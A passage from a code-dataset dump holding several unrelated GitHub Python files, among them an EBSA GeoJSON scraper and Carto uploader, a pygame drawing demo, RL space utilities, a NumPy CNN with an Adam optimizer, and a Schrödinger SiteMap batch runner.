)\n","repo_name":"sdpython/mlprodict","sub_path":"mlprodict/onnxrt/ops_cpu/op_zipmap.py","file_name":"op_zipmap.py","file_ext":"py","file_size_in_byte":6872,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"67"} +{"seq_id":"1119918561","text":"from cartoframes.auth import set_default_credentials\nfrom cartoframes import read_carto, to_carto\nimport geopandas as gpd\nimport pandas as pd\nimport os\nfrom shapely.validation import make_valid\nimport requests\nimport re\nfrom bs4 import BeautifulSoup\nimport glob\nimport json\n\nfrom dotenv import load_dotenv\nload_dotenv('/home/chemmerly/cred/.env')\n\ndata_dir = \"data\"\n\n#download list of EBSA data urls from https://chm.cbd.int/database\nraw_data_file = 'Aichi-Targets-data.csv'\n\n# read in the csv with the urls for the EBSA jsons\nurl_df = pd.read_csv(raw_data_file,encoding='latin-1')\nurl_list = url_df['CHM Url']\n\n# regex pattern for the finding a geojson \nmatch_st = re.compile(r'geojson') \nfor url in url_list:\n # scrape the page for the geojson\n r = requests.get(url) \n c = r.content \n soup = BeautifulSoup(c)\n for link in soup.findAll('a', attrs={'href': re.compile(\"geojson$\")}):\n href = link.get('href')\n url = 'https://chm.cbd.int' + href\n # download raw data\n r = requests.get(url)\n j = json.loads(r.content)\n #store data as geojson files\n raw_data_file = os.path.join(data_dir, os.path.basename(url))\n with open(raw_data_file, \"w\") as file:\n json.dump(j, file)\n\n#create list of geojson data for each ebsa from stored geojson file\nebsa_files = glob.glob(os.path.join(data_dir, '*geojson'))\ngdf_list = []\nfor file in ebsa_files:\n try:\n gdf = gpd.read_file(file)\n gdf_list.append(gdf)\n except Exception:\n print(\"Could not read \" + file)\n\n#create geopandas dataframe of EBSA data from list\ngdf_ebsa = gpd.GeoDataFrame(pd.concat(gdf_list))\n\n#store EBSA data locally as shapefiles\ngdf_ebsa.to_file('merged_ebsa.shp',driver='ESRI Shapefile')\n\n#upload EBSA data to Carto\ngdf_ebsa.columns = [x.lower().replace(' ', '_') for x in gdf_ebsa.columns]\ndataset_name = \"Ecologically and Biologically Significant Areas\"\nCARTO_USER = os.getenv('CARTO_WRI_RW_USER')\nCARTO_KEY = os.getenv('CARTO_WRI_RW_KEY')\nset_default_credentials(username=CARTO_USER, base_url=\"https://{user}.carto.com/\".format(user=CARTO_USER),api_key=CARTO_KEY)\nto_carto(gdf_ebsa, dataset_name + '_edit', if_exists='replace')","repo_name":"clairehemmerly/ocean_watch","sub_path":"EBSA_files_fetch.py","file_name":"EBSA_files_fetch.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"26321872271","text":"import pygame\npygame.init()\nwidth, height = 1280, 720\nwindow = pygame.display.set_mode((width, height))\npygame.display.set_caption(\"My Awesome Game\")\nfps = 30\nclock = pygame.time.Clock()\nstart = True\nwhile start:\n # Get Events\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n start = False\n pygame.quit()\n window.fill((240, 143, 250))\n yellow,pink,green = (253,235,8),(253,8,200),(58,223,117)\n pygame.draw.polygon(window,yellow,((491, 100), (788, 100), (937, 357),(788, 614), (491, 614), (342, 357)))\n pygame.draw.circle(window, green, (640, 360), 200)\n pygame.draw.line(window, pink, (468, 392), (812, 392), 10)\n pygame.draw.rect(window, pink, (468, 307, 345, 70), border_radius=5)\n\n\n # Update Display\n pygame.display.update()\n # Set FPS\n clock.tick(fps)","repo_name":"kirankuyate2157/python_programs","sub_path":"download_proggrams/Game_development_opencv-main/game_dev/draw_shapes.py","file_name":"draw_shapes.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"2787667447","text":"import numpy as np\nimport tensorflow as tf\n\nfrom surreal.spaces.primitive_spaces import PrimitiveSpace, Bool, Int, Float, Text\nfrom surreal.spaces.container_spaces import ContainerSpace, Dict, Tuple\nfrom surreal.utils.errors import SurrealError, SurrealSpaceError\nfrom surreal.utils.util import convert_dtype, LARGE_INTEGER, force_tuple\n\n\n# TODO: replace completely by `Component.get_variable` (python-backend)\ndef get_list_registry(from_space, capacity=None, initializer=0, flatten=True, add_batch_rank=False):\n \"\"\"\n Creates a list storage for a space by providing an ordered dict mapping space names\n to empty lists.\n\n Args:\n from_space: Space to create registry from.\n capacity (Optional[int]): Optional capacity to initialize list.\n initializer (Optional(any)): Optional initializer for list if capacity is not None.\n flatten (bool): Whether to produce a FlattenedDataOp with auto-keys.\n\n add_batch_rank (Optional[bool,int]): If from_space is given and is True, will add a 0th rank (None) to\n the created variable. If it is an int, will add that int instead of None.\n Default: False.\n\n Returns:\n dict: Container dict mapping core to empty lists.\n \"\"\"\n if flatten:\n if capacity is not None:\n var = from_space.flatten(\n custom_scope_separator=\"-\", scope_separator_at_start=False,\n mapping=lambda k, primitive: [initializer for _ in range(capacity)]\n )\n else:\n var = from_space.flatten(\n custom_scope_separator=\"-\", scope_separator_at_start=False,\n mapping=lambda k, primitive: []\n )\n else:\n if capacity is not None:\n var = [initializer for _ in range(capacity)]\n else:\n var = []\n return var\n\n\ndef get_space_from_data(data, num_categories=None, main_axes=None):\n \"\"\"\n Tries to re-create a Space object given some DataOp (e.g. a tf op).\n This is useful for shape inference on returned ops after having run through a graph_fn.\n\n Args:\n data (any): The data to create a corresponding Space for.\n\n num_categories (Optional[int]): An optional indicator, what the `num_categories` property for\n an Int should be.\n\n Returns:\n Space: The inferred Space object.\n \"\"\"\n # Dict.\n if isinstance(data, dict):\n spec = {}\n for key, value in data.items():\n\n # OBSOLETE THIS! Special case for Ints:\n # If another key exists, with the name: `_num_[key]` -> take num_categories from that key's value.\n #if key[:5] == \"_num_\":\n # continue\n #num_categories = data.get(\"_num_{}\".format(key))\n\n num_categories = num_categories.get(key, None) if isinstance(num_categories, dict) else num_categories\n spec[key] = get_space_from_data(value, num_categories=num_categories, main_axes=main_axes)\n # Return\n if spec[key] == 0:\n return 0\n return Dict(spec, main_axes=main_axes)\n # Tuple.\n elif isinstance(data, tuple):\n spec = []\n for i in data:\n space = get_space_from_data(i, main_axes=main_axes)\n if space == 0:\n return 0\n spec.append(space)\n return Tuple(spec, main_axes=main_axes)\n # Primitive Space -> Infer from data dtype and shape.\n else:\n # `data` itself is a single value, simple python type.\n if isinstance(data, int):\n int_high = {\"high\": num_categories} if num_categories is not None else {}\n return PrimitiveSpace.make(spec=type(data), shape=(), **int_high)\n elif isinstance(data, (bool, float)):\n return PrimitiveSpace.make(spec=type(data), shape=())\n elif isinstance(data, str):\n raise SurrealError(\"Cannot derive Space from str data ({})!\".format(data))\n # A single numpy array.\n elif isinstance(data, (np.ndarray, tf.Tensor)):\n dtype = convert_dtype(data.dtype, \"np\")\n int_high = {\"high\": num_categories} if num_categories is not None and \\\n dtype in [np.uint8, np.int16, np.int32, np.int64] else {}\n # Must subtract main_axes from beginning of data.shape.\n shape = tuple(data.shape[len(main_axes or []):])\n return PrimitiveSpace.make(\n spec=dtype, shape=shape, main_axes=main_axes, **int_high\n )\n # Try inferring the Space from a python list.\n elif isinstance(data, list):\n return try_space_inference_from_list(data)\n # No Space: e.g. the tf.no_op, a distribution (anything that's not a tensor).\n # PyTorch Tensors do not have get_shape so must check backend.\n elif hasattr(data, \"dtype\") is False or not hasattr(data, \"get_shape\"):\n return 0\n\n raise SurrealError(\"ERROR: Cannot derive Space from data '{}' (unknown type?)!\".format(data))\n\n\ndef sanity_check_space(\n space, allowed_types=None, allowed_sub_types=None, non_allowed_types=None, non_allowed_sub_types=None,\n must_have_batch_rank=None, must_have_time_rank=None, must_have_batch_or_time_rank=False,\n must_have_categories=None, num_categories=None,\n must_have_lower_limit=None, must_have_upper_limit=None,\n rank=None, shape=None\n):\n \"\"\"\n Sanity checks a given Space for certain criteria and raises exceptions if they are not met.\n\n Args:\n space (Space): The Space object to check.\n allowed_types (Optional[List[type]]): A list of types that this Space must be an instance of.\n\n allowed_sub_types (Optional[List[type]]): For container core, a list of sub-types that all\n flattened sub-Spaces must be an instance of.\n\n non_allowed_types (Optional[List[type]]): A list of type that this Space must not be an instance of.\n\n non_allowed_sub_types (Optional[List[type]]): For container core, a list of sub-types that all\n flattened sub-Spaces must not be an instance of.\n\n must_have_batch_rank (Optional[bool]): Whether the Space must (True) or must not (False) have the\n `has_batch_rank` property set to True. None, if it doesn't matter.\n\n must_have_time_rank (Optional[bool]): Whether the Space must (True) or must not (False) have the\n `has_time_rank` property set to True. None, if it doesn't matter.\n\n must_have_batch_or_time_rank (Optional[bool]): Whether the Space must (True) or must not (False) have either\n the `has_batch_rank` or the `has_time_rank` property set to True.\n\n must_have_categories (Optional[bool]): For IntBoxes, whether the Space must (True) or must not (False) have\n global bounds with `num_categories` > 0. None, if it doesn't matter.\n\n num_categories (Optional[int,tuple]): An int or a tuple (min,max) range within which the Space's\n `num_categories` rank must lie. Only valid for IntBoxes.\n None if it doesn't matter.\n\n must_have_lower_limit (Optional[bool]): If not None, whether this Space must have a lower limit.\n must_have_upper_limit (Optional[bool]): If not None, whether this Space must have an upper limit.\n\n rank (Optional[int,tuple]): An int or a tuple (min,max) range within which the Space's rank must lie.\n None if it doesn't matter.\n\n shape (Optional[tuple[int]]): A tuple of ints specifying the required shape. None if it doesn't matter.\n\n Raises:\n RLGraphSpaceError: If any of the conditions is not met.\n \"\"\"\n flattened_space = space.flatten()\n\n # Check the types.\n if allowed_types is not None:\n if not isinstance(space, force_tuple(allowed_types)):\n raise SurrealSpaceError(\n space, \"ERROR: Space ({}) is not an instance of {}!\".format(space, allowed_types)\n )\n\n if allowed_sub_types is not None:\n for flat_key, sub_space in flattened_space.items():\n if not isinstance(sub_space, force_tuple(allowed_sub_types)):\n raise SurrealSpaceError(\n sub_space,\n \"ERROR: sub-Space '{}' ({}) is not an instance of {}!\".\n format(flat_key, sub_space, allowed_sub_types)\n )\n\n if non_allowed_types is not None:\n if isinstance(space, force_tuple(non_allowed_types)):\n raise SurrealSpaceError(\n space,\n \"ERROR: Space ({}) must not be an instance of {}!\".format(space, non_allowed_types)\n )\n\n if non_allowed_sub_types is not None:\n for flat_key, sub_space in flattened_space.items():\n if isinstance(sub_space, force_tuple(non_allowed_sub_types)):\n raise SurrealSpaceError(\n sub_space,\n \"ERROR: sub-Space '{}' ({}) must not be an instance of {}!\".\n format(flat_key, sub_space, non_allowed_sub_types)\n )\n\n if must_have_batch_or_time_rank is True:\n if space.has_batch_rank is False and space.has_time_rank is False:\n raise SurrealSpaceError(\n space,\n \"ERROR: Space ({}) does not have a batch- or a time-rank, but must have either one of \"\n \"these!\".format(space)\n )\n\n if must_have_batch_rank is not None:\n if (space.has_batch_rank is False and must_have_batch_rank is True) or \\\n (space.has_batch_rank is not False and must_have_batch_rank is False):\n # Last chance: Check for rank >= 2, that would be ok as well.\n if must_have_batch_rank is True and len(space.get_shape(main_axes=\"B\")) >= 2:\n pass\n # Something is wrong.\n elif space.has_batch_rank is not False:\n raise SurrealSpaceError(\n space,\n \"ERROR: Space ({}) has a batch rank, but is not allowed to!\".format(space)\n )\n else:\n raise SurrealSpaceError(\n space,\n \"ERROR: Space ({}) does not have a batch rank, but must have one!\".format(space)\n )\n\n if must_have_time_rank is not None:\n if (space.has_time_rank is False and must_have_time_rank is True) or \\\n (space.has_time_rank is not False and must_have_time_rank is False):\n # Last chance: Check for rank >= 3, that would be ok as well.\n if must_have_time_rank is True and len(space.get_shape(main_axes=[\"B\", \"T\"])) >= 2:\n pass\n # Something is wrong.\n elif space.has_time_rank is not False:\n raise SurrealSpaceError(\n space,\n \"ERROR: Space ({}) has a time rank, but is not allowed to!\".format(space)\n )\n else:\n raise SurrealSpaceError(\n space,\n \"ERROR: Space ({}) does not have a time rank, but must have one!\".format(space)\n )\n\n if must_have_categories is not None:\n for flat_key, sub_space in flattened_space.items():\n if not isinstance(sub_space, Int):\n raise SurrealSpaceError(\n sub_space,\n \"ERROR: Space {}({}) is not an Int. Only Int Spaces can have categories!\".\n format(\"\" if flat_key == \"\" else \"'{}' \".format(flat_key), space)\n )\n elif sub_space.global_bounds is False:\n raise SurrealSpaceError(\n sub_space,\n \"ERROR: Space {}({}) must have categories (globally valid value bounds)!\".\n format(\"\" if flat_key == \"\" else \"'{}' \".format(flat_key), space)\n )\n\n if must_have_lower_limit is not None:\n for flat_key, sub_space in flattened_space.items():\n low = sub_space.low\n if must_have_lower_limit is True and (low == -LARGE_INTEGER or low == float(\"-inf\")):\n raise SurrealSpaceError(\n sub_space,\n \"ERROR: Space {}({}) must have a lower limit, but has none!\".\n format(\"\" if flat_key == \"\" else \"'{}' \".format(flat_key), space)\n )\n elif must_have_lower_limit is False and (low != -LARGE_INTEGER and low != float(\"-inf\")):\n raise SurrealSpaceError(\n sub_space,\n \"ERROR: Space {}({}) must not have a lower limit, but has one ({})!\".\n format(\"\" if flat_key == \"\" else \"'{}' \".format(flat_key), space, low)\n )\n\n if must_have_upper_limit is not None:\n for flat_key, sub_space in flattened_space.items():\n high = sub_space.high\n if must_have_upper_limit is True and (high != LARGE_INTEGER and high != float(\"inf\")):\n raise SurrealSpaceError(\n sub_space,\n \"ERROR: Space {}({}) must have an upper limit, but has none!\".\n format(\"\" if flat_key == \"\" else \"'{}' \".format(flat_key), space)\n )\n elif must_have_upper_limit is False and (high == LARGE_INTEGER or high == float(\"inf\")):\n raise SurrealSpaceError(\n sub_space,\n \"ERROR: Space {}({}) must not have a upper limit, but has one ({})!\".\n format(\"\" if flat_key == \"\" else \"'{}' \".format(flat_key), space, high)\n )\n\n if rank is not None:\n if isinstance(rank, int):\n for flat_key, sub_space in flattened_space.items():\n if sub_space.rank != rank:\n raise SurrealSpaceError(\n sub_space,\n \"ERROR: A Space (flat-key={}) of '{}' has rank {}, but must have rank \"\n \"{}!\".format(flat_key, space, sub_space.rank, rank)\n )\n else:\n for flat_key, sub_space in flattened_space.items():\n if not ((rank[0] or 0) <= sub_space.rank <= (rank[1] or float(\"inf\"))):\n raise SurrealSpaceError(\n\n sub_space,\n \"ERROR: A Space (flat-key={}) of '{}' has rank {}, but its rank must be between {} and \"\n \"{}!\".format(flat_key, space, sub_space.rank, rank[0], rank[1])\n )\n\n if shape is not None:\n for flat_key, sub_space in flattened_space.items():\n if sub_space.shape != shape:\n raise SurrealSpaceError(\n sub_space,\n \"ERROR: A Space (flat-key={}) of '{}' has shape {}, but its shape must be \"\n \"{}!\".format(flat_key, space, sub_space.get_shape(), shape)\n )\n\n if num_categories is not None:\n for flat_key, sub_space in flattened_space.items():\n if not isinstance(sub_space, Int):\n raise SurrealSpaceError(\n sub_space,\n \"ERROR: A Space (flat-key={}) of '{}' is not an Int. Only Int Spaces can have \"\n \"categories!\".format(flat_key, space)\n )\n elif isinstance(num_categories, int):\n if sub_space.num_categories != num_categories:\n raise SurrealSpaceError(\n sub_space,\n \"ERROR: A Space (flat-key={}) of '{}' has `num_categories` {}, but must have {}!\".\n format(flat_key, space, sub_space.num_categories, num_categories)\n )\n elif not ((num_categories[0] or 0) <= sub_space.num_categories <= (num_categories[1] or float(\"inf\"))):\n raise SurrealSpaceError(sub_space,\n \"ERROR: A Space (flat-key={}) of '{}' has `num_categories` {}, but this value must be between \"\n \"{} and {}!\".format(flat_key, space, sub_space.num_categories, num_categories[0], num_categories[1])\n )\n\n\ndef check_space_equivalence(space1, space2):\n \"\"\"\n Compares the two input Spaces for equivalence and returns the more generic Space of the two.\n The more generic Space is the one that has the properties has_batch_rank and/or has _time_rank set (instead of\n hard values in these ranks).\n E.g.: Float((64,)) is equivalent with Float((), +batch-rank). The latter will be returned.\n\n NOTE: Float((2,)) and Float((3,)) are NOT equivalent.\n\n Args:\n space1 (Space): The 1st Space to compare.\n space2 (Space): The 2nd Space to compare.\n\n Returns:\n Union[Space,False]: False is the two core are not equivalent. The more generic Space of the two if they are\n equivalent.\n \"\"\"\n # Spaces are the same: Return one of them.\n if space1 == space2:\n return space1\n # One has batch-rank, the other doesn't, but has one more rank.\n elif space1.has_batch_rank and not space2.has_batch_rank and \\\n (np.asarray(space1.rank) == np.asarray(space2.rank) - 1).all():\n return space1\n elif space2.has_batch_rank and not space1.has_batch_rank and \\\n (np.asarray(space2.rank) == np.asarray(space1.rank) - 1).all():\n return space2\n # TODO: time rank?\n\n return False\n\n\ndef try_space_inference_from_list(list_op):\n \"\"\"\n Attempts to infer shape space from a list op. A list op may be the result of fetching state from a Python\n memory.\n\n Args:\n list_op (list): List with arbitrary sub-structure.\n\n Returns:\n Space: Inferred Space object represented by list.\n \"\"\"\n shape = len(list_op)\n if shape > 0:\n # Try to infer more things by looking inside list.\n elem = list_op[0]\n if isinstance(elem, tf.Tensor):\n list_type = elem.dtype\n inner_shape = elem.shape\n return PrimitiveSpace.make(spec=convert_dtype(list_type, \"np\"), shape=(shape,) + inner_shape,\n add_batch_rank=True)\n elif isinstance(elem, list):\n inner_shape = len(elem)\n return PrimitiveSpace.make(spec=convert_dtype(float, \"np\"), shape=(shape, inner_shape),\n add_batch_rank=True)\n elif isinstance(elem, int):\n # In case of missing comma values, check all other items in list for float.\n # If one float in there -> Float, otherwise -> Int.\n has_floats = any(isinstance(el, float) for el in list_op)\n if has_floats is False:\n return Int.make(shape=(shape,), add_batch_rank=True)\n else:\n return Float.make(shape=(shape,), add_batch_rank=True)\n elif isinstance(elem, float):\n return Float.make(shape=(shape,), add_batch_rank=True)\n else:\n # Most general guess is a Float box.\n return Float(shape=(shape,))\n\n\ndef get_default_distribution_from_space(\n space, *, num_mixture_experts=0, bounded_distribution_type=\"beta\",\n discrete_distribution_type=\"categorical\", gumbel_softmax_temperature=1.0\n):\n \"\"\"\n Args:\n space (Space): The primitive Space for which to derive a default distribution spec.\n\n num_mixture_experts (int): If > 0, use a mixture distribution over the determined \"base\"-distribution using n\n experts. TODO: So far, this only works for continuous distributions.\n\n bounded_distribution_type (str): The lookup class string for a bounded Float distribution.\n Default: \"beta\".\n\n discrete_distribution_type(str): The class of distributions to use for discrete action core. For options\n check the components.distributions package. Default: categorical. Agents requiring reparameterization\n may require a GumbelSoftmax distribution instead.\n\n gumbel_softmax_temperature (float): Temperature parameter for the Gumbel-Softmax distribution used\n for discrete actions.\n\n Returns:\n Dict: A Spec dict, from which a valid default distribution object can be created.\n \"\"\"\n # Int: Categorical.\n if isinstance(space, Int):\n assert discrete_distribution_type in [\"gumbel-softmax\", \"categorical\"]\n if discrete_distribution_type == \"gumbel-softmax\":\n return dict(type=\"gumbel-softmax\", temperature=gumbel_softmax_temperature)\n else:\n return dict(type=discrete_distribution_type)\n\n # Bool: Bernoulli.\n elif isinstance(space, Bool):\n return dict(type=\"bernoulli\")\n\n # Continuous action space: Normal/Beta/etc. distribution.\n elif isinstance(space, Float):\n # Unbounded -> Normal distribution.\n if not is_bounded_space(space):\n single = dict(type=\"normal\")\n # Bounded -> according to the bounded_distribution parameter.\n else:\n assert bounded_distribution_type in [\"beta\", \"squashed-normal\"]\n single = dict(type=bounded_distribution_type, low=space.low, high=space.high)\n\n # Use a mixture distribution?\n if num_mixture_experts > 0:\n return dict(type=\"mixture\", _args=single, num_experts=num_mixture_experts)\n else:\n return single\n\n # Container Space.\n elif isinstance(space, ContainerSpace):\n return dict(\n type=\"joint-cumulative\",\n distributions=tf.nest.pack_sequence_as(space.structure, tf.nest.map_structure(lambda s: get_default_distribution_from_space(s), tf.nest.flatten(space)))\n )\n else:\n raise SurrealError(\"No distribution defined for space {}!\".format(space))\n\n\ndef is_bounded_space(box_space):\n if not isinstance(box_space, Float):\n return False\n # Unbounded.\n if box_space.low == float(\"-inf\") and box_space.high == float(\"inf\"):\n return False\n # Bounded.\n elif box_space.low != float(\"-inf\") and box_space.high != float(\"inf\"):\n return True\n # TODO: Semi-bounded -> Exponential distribution.\n else:\n raise SurrealError(\n \"Semi-bounded core for distribution-generation are not supported yet! You passed in low={} high={}.\".\n format(box_space.low, box_space.high)\n )\n","repo_name":"ducandu/surreal","sub_path":"surreal/spaces/space_utils.py","file_name":"space_utils.py","file_ext":"py","file_size_in_byte":22267,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"67"} +{"seq_id":"15140857611","text":"import re\n\nwhile True:\n input_text = input()\n if len(input_text) != 0:\n match_pattern = re.compile(r'\\d+')\n matches = match_pattern.finditer(input_text)\n for match in matches:\n print(match.group(0), end=' ')\n else:\n break","repo_name":"radoslav-petkov/SoftUni---Fundamentals---Python---2022","sub_path":"25.Regular Expressions - Exercise/01. Capture the Numbers.py","file_name":"01. Capture the Numbers.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"44363882427","text":"import numpy as np\n\nfrom CNN.layers import convolutional_layer, maxpool_layer, loss_function, softmax, backpropagation_maxpool, backpropagation_convolutionalLayer\n\n\ndef build_net(image, label, parameters, stride, pooling_filter, pooling_stride):\n [weight1, weight2, weight3, weight4, bias1, bias2, bias3, bias4] = parameters\n\n #forward propagation\n first_convolution = convolutional_layer(image, weight1, bias1, stride)\n first_convolution[first_convolution <= 0] = 0\n\n second_convolution = convolutional_layer(first_convolution, weight2, bias2, stride)\n second_convolution[second_convolution <= 0] = 0\n\n pooling_layer = maxpool_layer(second_convolution, pooling_filter, pooling_stride)\n\n (num_filters, height_width, same) = pooling_layer.shape\n\n flatten = pooling_layer.reshape((num_filters * height_width * height_width, 1))\n\n fully_connected1 = weight3.dot(flatten) + bias3\n fully_connected1[fully_connected1 <= 0] = 0\n\n fully_connected2 = weight4.dot(fully_connected1) + bias4\n\n prediction = softmax(fully_connected2)\n\n loss = loss_function(prediction, label)\n\n #backpropagation\n derivative_second_fully_conn = prediction - label\n gradient_weight4 = derivative_second_fully_conn.dot(fully_connected1.T)\n gradient_bias4 = np.sum(derivative_second_fully_conn, axis=1).reshape(bias4.shape)\n\n derivative_first_fully_conn = weight4.T.dot(derivative_second_fully_conn)\n derivative_first_fully_conn[fully_connected1 <= 0] = 0\n gradient_weight3 = derivative_first_fully_conn.dot(flatten.T)\n gradient_bias3 = np.sum(derivative_first_fully_conn, axis=1).reshape(bias3.shape)\n\n der_second_fc = weight3.T.dot(derivative_first_fully_conn)\n der_maxpool = der_second_fc.reshape(pooling_layer.shape)\n\n der_conv2 = backpropagation_maxpool(der_maxpool, second_convolution, pooling_filter, pooling_stride)\n der_conv2[second_convolution <= 0] = 0\n\n der_conv1, gradient_weight2, der_bias2 = backpropagation_convolutionalLayer(der_conv2, first_convolution, weight2, stride)\n der_conv1[first_convolution <= 0] = 0\n\n image_der, gradient_weight1, der_bias1 = backpropagation_convolutionalLayer(der_conv1, image, weight1, stride)\n\n gradients = [gradient_weight1, gradient_weight2, gradient_weight3, gradient_weight4, bias1, bias2, bias3, bias4]\n return gradients, loss\n\n\n# Adams optimizer\n\ndef adam_optimizer(batch, num_classes, alpha, dim, n_c, beta1, beta2, parameters, cost_array, E=1e-7):\n\n [weight1, weight2, weight3, weight4, bias1, bias2, bias3, bias4] = parameters\n\n batch_size = len(batch)\n\n images = batch[:, 0:-1]\n images = images.reshape((batch_size, n_c, dim, dim))\n\n labels = batch[:, -1]\n\n cost = 0\n\n # initialize gradients with zeros\n grad_w1 = np.zeros(weight1.shape)\n grad_w2 = np.zeros(weight2.shape)\n grad_w3 = np.zeros(weight3.shape)\n grad_w4 = np.zeros(weight4.shape)\n grad_b1 = np.zeros(bias1.shape)\n grad_b2 = np.zeros(bias2.shape)\n grad_b3 = np.zeros(bias3.shape)\n grad_b4 = np.zeros(bias4.shape)\n\n # initialize momentum parameters with zeros\n moment_param_w1 = np.zeros(weight1.shape)\n moment_param_w2 = np.zeros(weight2.shape)\n moment_param_w3 = np.zeros(weight3.shape)\n moment_param_w4 = np.zeros(weight4.shape)\n moment_param_b1 = np.zeros(bias1.shape)\n moment_param_b2 = np.zeros(bias2.shape)\n moment_param_b3 = np.zeros(bias3.shape)\n moment_param_b4 = np.zeros(bias4.shape)\n\n # initialize RMS-prop parameters with zeros\n rmsprop_w1 = np.zeros(weight1.shape)\n rmsprop_w2 = np.zeros(weight2.shape)\n rmsprop_w3 = np.zeros(weight3.shape)\n rmsprop_w4 = np.zeros(weight4.shape)\n rmsprop_b1 = np.zeros(bias1.shape)\n rmsprop_b2 = np.zeros(bias2.shape)\n rmsprop_b3 = np.zeros(bias3.shape)\n rmsprop_b4 = np.zeros(bias4.shape)\n\n\n for i in range(batch_size):\n image = images[i]\n label = np.eye(num_classes)[int(labels[i])].reshape((num_classes, 1))\n\n gradients, loss = build_net(image, label, parameters, 1, 2, 2)\n\n [gradient_weight1, gradient_weight2, gradient_weight3, gradient_weight4, bias1, bias2, bias3, bias4] = gradients\n\n grad_w1 += gradient_weight1\n grad_w2 += gradient_weight2\n grad_w3 += gradient_weight3\n grad_w4 += gradient_weight4\n grad_b1 += bias1\n grad_b2 += bias2\n grad_b3 += bias3\n grad_b4 += bias4\n\n cost += loss\n\n # update momentum and RMS-prop parameters\n moment_param_w1 = beta1 * moment_param_w1 + (1 - beta1) * grad_w1 / batch_size\n rmsprop_w1 = beta2 * rmsprop_w1 + (1 - beta2) * (grad_w1 / batch_size) ** 2\n weight1 -= alpha * moment_param_w1 / np.sqrt(rmsprop_w1 + E)\n\n moment_param_w2 = beta1 * moment_param_w2 + (1 - beta1) * grad_w2 / batch_size\n rmsprop_w2 = beta2 * rmsprop_w2 + (1 - beta2) * (grad_w2 / batch_size) ** 2\n weight2 -= alpha * moment_param_w2 / np.sqrt(rmsprop_w2 + E)\n\n moment_param_w3 = beta1 * moment_param_w3 + (1 - beta1) * grad_w3 / batch_size\n rmsprop_w3 = beta2 * rmsprop_w3 + (1 - beta2) * (grad_w3 / batch_size) ** 2\n weight3 -= alpha * moment_param_w3 / np.sqrt(rmsprop_w3 + E)\n\n moment_param_w4 = beta1 * moment_param_w4 + (1 - beta1) * grad_w4 / batch_size\n rmsprop_w4 = beta2 * rmsprop_w4 + (1 - beta2) * (grad_w4 / batch_size) ** 2\n weight4 -= alpha * moment_param_w4 / np.sqrt(rmsprop_w4 + E)\n\n moment_param_b1 = beta1 * moment_param_b1 + (1 - beta1) * grad_b1 / batch_size\n rmsprop_b1 = beta2 * rmsprop_b1 + (1 - beta2) * (grad_b1 / batch_size) ** 2\n bias1 -= alpha * moment_param_b1 / np.sqrt(rmsprop_b1 + E)\n\n moment_param_b2 = beta1 * moment_param_b2 + (1 - beta1) * grad_b2 / batch_size\n rmsprop_b2 = beta2 * rmsprop_b2 + (1 - beta2) * (grad_b2 / batch_size) ** 2\n bias2 -= alpha * moment_param_b2 / np.sqrt(rmsprop_b2 + E)\n\n moment_param_b3 = beta1 * moment_param_b3 + (1 - beta1) * grad_b3 / batch_size\n rmsprop_b3 = beta2 * rmsprop_b3 + (1 - beta2) * (grad_b3 / batch_size) ** 2\n bias3 -= alpha * moment_param_b3 / np.sqrt(rmsprop_b3 + E)\n\n moment_param_b4 = beta1 * moment_param_b4 + (1 - beta1) * grad_b4 / batch_size\n rmsprop_b4 = beta2 * rmsprop_b4 + (1 - beta2) * (grad_b4 / batch_size) ** 2\n bias4 -= alpha * moment_param_b4 / np.sqrt(rmsprop_b4 + E)\n\n cost = cost / batch_size\n cost_array.append(cost)\n\n parameters = [weight1, weight2, weight3, weight4, bias1, bias2, bias3, bias4]\n\n return parameters, cost_array","repo_name":"DayanaPankova/Shut-Down-My-PC-When-I-Fall-Asleep-","sub_path":"CNN/build_net.py","file_name":"build_net.py","file_ext":"py","file_size_in_byte":6459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"22256773793","text":"import glob\nfrom prody import *\nimport numpy as np\nimport os\nimport time\nimport subprocess\nimport argparse\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom scipy.cluster.hierarchy import dendrogram, linkage, cophenet, fcluster \nfrom scipy.spatial.distance import pdist\nimport pickle\n\nschrodinger_path = '/data/general_software/schrodinger2019-1'\n\ndef parserfunc():\n parser = argparse.ArgumentParser(\n description ='Given a directory with mae files, redactar blablabla')\n\n parser.add_argument('-d', dest=\"maedir\", help = \"MAEs directory\", required=True)\n parser.add_argument('-o', dest=\"outdir\", help = \"Output directory\", required=True)\n \n args = parser.parse_args()\n return args\n\ndef siteMap(maes,asl,delimiter=None,outfmt='mae',max_processes=4):\n \"\"\"\n Run a SiteMap calculation for a list of MAEs (can't be pdbs).\n maes: 'list'. MAE list of elements\n asl: 'str'. ASL (atom specification Language)\n delimiter: 'str'. Delimiter to obtain an identifier from each MAE name\n outfmt: 'str'. Outfile format. Either .mae or .pdb\n max_processes: Number of processors used to paralalize the different executions\n \"\"\"\n MAEnames = [os.path.basename(mae) for mae in maes]\n if delimiter != None:\n IDs = [ maename.replace(\".mae\",\"\").split(delimiter)[0] for maename in MAEnames]\n else:\n IDs = [ maename.replace(\".mae\",\"\") for maename in MAEnames]\n\n cmd_SiteMap = ['%s/sitemap -j %s -prot %s -sitebox 12 -resolution standard -reportsize 20 -writestructs no -writevis yes -maxsites 1 -siteasl \"%s\" -WAIT'%(schrodinger_path,IDs[i],mae,asl) for i,mae in enumerate(maes)]\n cmd_SiteMap = [cmd.replace(\"//\",\"/\") for cmd in cmd_SiteMap]\n\n processes = set()\n\n for cmd in cmd_SiteMap:\n print(cmd)\n processes.add(subprocess.Popen(cmd,shell=True))\n for p in processes:\n p.wait()\n if p.wait() != 0:\n print(\"There was an error\")\n\ndef _clean_siteMap(outdir,outfmt='maegz'):\n \"\"\"\n Move the SiteMap output to an specified directory\n outdir: 'str'. Output directory\n outfmt: 'str'. Outfile format of the PrepWizard. Either .mae or 